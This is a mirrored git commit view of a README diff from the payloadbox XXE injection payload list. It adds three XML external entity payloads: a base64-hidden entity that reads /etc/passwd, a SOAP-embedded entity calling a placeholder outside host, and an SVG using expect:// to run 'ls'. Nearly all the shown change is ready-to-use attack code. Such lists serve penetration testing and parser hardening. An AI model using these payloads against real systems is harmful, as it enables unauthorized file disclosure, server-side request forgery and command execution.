mirror of
https://github.com/payloadbox/xxe-injection-payload-list.git
synced 2025-12-29 16:15:06 +00:00
Update README.md
This commit is contained in:
24
README.md
24
README.md
@@ -127,6 +127,30 @@ There are various types of XXE attacks:
|
|||||||
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
|
||||||
```
|
```
|
||||||
|
|
||||||
|
###### XXE: Base64 Encoded
|
||||||
|
|
||||||
|
```
|
||||||
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
|
||||||
|
```
|
||||||
|
|
||||||
|
###### XXE: XXE inside SOAP Example
|
||||||
|
|
||||||
|
```
|
||||||
|
<soap:Body>
|
||||||
|
<foo>
|
||||||
|
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
|
||||||
|
</foo>
|
||||||
|
</soap:Body>
|
||||||
|
```
|
||||||
|
|
||||||
|
###### XXE: XXE inside SVG
|
||||||
|
|
||||||
|
```
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
|
||||||
|
<image xlink:href="expect://ls"></image>
|
||||||
|
</svg>
|
||||||
|
```
|
||||||
|
|
||||||
#### References :
|
#### References :
|
||||||
|
|
||||||
👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
||||||
|
|||||||
Reference in New Issue
Block a user